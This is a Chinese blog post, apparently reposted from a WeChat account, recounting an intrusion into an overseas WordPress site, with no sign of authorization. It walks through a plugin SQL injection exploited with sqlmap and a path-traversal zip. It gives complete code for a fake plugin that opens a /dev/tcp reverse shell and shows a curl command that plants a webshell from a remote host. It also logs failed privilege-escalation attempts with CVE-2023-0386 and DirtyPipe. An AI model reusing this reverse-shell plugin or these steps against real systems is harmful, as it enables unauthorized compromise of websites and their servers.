一.扫描目标存在WordPress 页面浏览量 <2.4.15 - SQL 注入
丢给sqlmap注入
加上--technique=B
很幸运解开了其中一个
二.Getshell
Wordpress一般就是插件/模板拿shell,但是这个目标禁止了这两个目录的文件访问
wp-content/themes
wp-content/plugins
尝试跨目录,我的构造是python ./evilarc.py test.php -o unix -d 3 -f 3.zip
然后在3.zip里面放一个php文件,内容是
/*Plugin Name: My Custom PluginDescription: This is a simple plugin.Version: 1.0Author: You*/include("../../../test.php");
失败了,wordpress做了路径清理
换个思路,不去访问webshell,反弹回来,这样构造
/*Plugin Name: Reverse Shell PluginDescription: This plugin will reverse shell upon activation.Version: 1.0Author: You*/$ip = '*.*.*.*'; //你的IP$port =80; //你的端口//执行sh反弹$shell = "/bin/sh -c 'sh -i >& /dev/tcp/$ip/$port 0>&1'";shell_exec($shell);
插件一旦上传并激活,PHP会执行 shell_exec(),调用 /bin/sh,从而反弹。只要 shell_exec() 没被禁用就能成功。
但是ls或者dir看不到路径,我只能从列出来的文件中看出来我是在wp-admin目录中。
写个phpinfo确认下
echo "<?php phpinfo(); ?>" > shell.php
得到绝对路径,尝试写入了一些免杀一句话,内容没问题
但是都连不上
可能和一个反病毒产品有关系
远程下载一个大马进去
curl -o /var/www/html/shell.php https://example.com/shell.php
三.尝试提权
uname -a
Linux 8c05af7f0c6c 5.15.0-138-generic #148-Ubuntu SMP Fri Mar 14 19:05:48 UTC 2025 x86_64 GNU/Linux
反弹MSF并进行扫描
尝试CVE-2023-0386失败
CVE-2023-0386 是一个 Linux OverlayFS 权限提升漏洞,影响 Linux 内核 5.4–6.2(包含常见的 5.15 LTS 版本)。允许低权限用户提权为 root,前提是系统启用了 OverlayFS(通常默认启用)。
查询相关资料
因为普通用户没有 CAP_SYS_ADMIN 能力,需要使用漏洞利用程序来“模拟”挂载行为,绕过权限限制
继续尝试dirtypipe
失败。尝试了gib上一些其他的本地编译exp去打也都失败了(之前遇到过类似的情况,msf失败,但是自己编译的成功了的)问了群友也没有好的办法
四.最后的问题
Ping 域名 [1.1.1.240] ,这个IP查到有很多资产,其中也有反病毒产品在8020端口,然后反弹的ip给我是1.1.1.198,这个IP查到什么域名都没有,只有反病毒产品,我看端口8020又没开;哎还是太废物了,真的很讨厌提权,我瞄准的目标基本上十个能打下来八个shell,但是提权的成功率只有一半,有没有师傅,重金求学~
原文始发于微信公众号(边界安全):记一次境外wordpress的实战渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论